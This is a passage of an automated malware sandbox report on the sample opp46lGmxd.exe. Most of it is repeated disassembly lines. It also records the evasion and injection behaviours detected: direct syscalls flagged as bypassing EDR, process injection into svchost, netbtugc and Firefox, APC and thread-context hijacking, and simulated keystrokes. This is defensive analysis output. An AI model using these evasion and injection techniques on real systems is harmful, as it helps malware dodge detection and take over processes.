            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]2_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]2_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]2_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]2_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]2_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]2_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]2_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]2_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]2_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A830 mov eax, dword ptr fs:[00000030h]2_2_03B6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h]2_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h]2_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC810 mov eax, dword ptr fs:[00000030h]2_2_03BBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h]2_2_03BBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h]2_2_03BBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6870 mov eax, dword ptr fs:[00000030h]2_2_03BC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6870 mov eax, dword ptr fs:[00000030h]2_2_03BC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60854 mov eax, dword ptr fs:[00000030h]2_2_03B60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34859 mov eax, dword ptr fs:[00000030h]2_2_03B34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34859 mov eax, dword ptr fs:[00000030h]2_2_03B34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B42840 mov ecx, dword ptr fs:[00000030h]2_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04FE7 mov eax, dword ptr fs:[00000030h]2_2_03C04FE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62F98 mov eax, dword ptr fs:[00000030h]2_2_03B62F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62F98 mov eax, dword ptr fs:[00000030h]2_2_03B62F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CF80 mov eax, dword ptr fs:[00000030h]2_2_03B6CF80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70FF6 mov eax, dword ptr fs:[00000030h]2_2_03B70FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70FF6 mov eax, dword ptr fs:[00000030h]2_2_03B70FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70FF6 mov eax, dword ptr fs:[00000030h]2_2_03B70FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70FF6 mov eax, dword ptr fs:[00000030h]2_2_03B70FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE6FF7 mov eax, dword ptr fs:[00000030h]2_2_03BE6FF7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE0 mov eax, dword ptr fs:[00000030h]2_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE0 mov eax, dword ptr fs:[00000030h]2_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03B2EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03B2EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03B2EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC8 mov eax, dword ptr fs:[00000030h]2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC8 mov eax, dword ptr fs:[00000030h]2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC8 mov eax, dword ptr fs:[00000030h]2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC8 mov eax, dword ptr fs:[00000030h]2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EF28 mov eax, dword ptr fs:[00000030h]2_2_03B5EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32F12 mov eax, dword ptr fs:[00000030h]2_2_03B32F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04F68 mov eax, dword ptr fs:[00000030h]2_2_03C04F68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CF1F mov eax, dword ptr fs:[00000030h]2_2_03B6CF1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE6F00 mov eax, dword ptr fs:[00000030h]2_2_03BE6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5AF69 mov eax, dword ptr fs:[00000030h]2_2_03B5AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5AF69 mov eax, dword ptr fs:[00000030h]2_2_03B5AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2F60 mov eax, dword ptr fs:[00000030h]2_2_03BD2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2F60 mov eax, dword ptr fs:[00000030h]2_2_03BD2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CF50 mov eax, dword ptr fs:[00000030h]2_2_03B6CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD0F50 mov eax, dword ptr fs:[00000030h]2_2_03BD0F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F40 mov eax, dword ptr fs:[00000030h]2_2_03BB4F40
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AB81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00AB81F7
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A8A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A8A395
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A8A364 SetUnhandledExceptionFilter,0_2_00A8A364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtClose: Direct from: 0x76F12B6C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtOpenKeyEx: Direct from: 0x76F13C9CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtQueryValueKey: Direct from: 0x76F12BECJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\opp46lGmxd.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 8020Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\opp46lGmxd.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30E1008Jump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AB8C93 LogonUserW,0_2_00AB8C93
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A63B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00A63B4C
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A64A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00A64A35
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC4EF5 mouse_event,0_2_00AC4EF5
            Source: C:\Users\user\Desktop\opp46lGmxd.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\opp46lGmxd.exe"Jump to behavior
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AB81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00AB81F7
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00AC4C03
            Source: opp46lGmxd.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
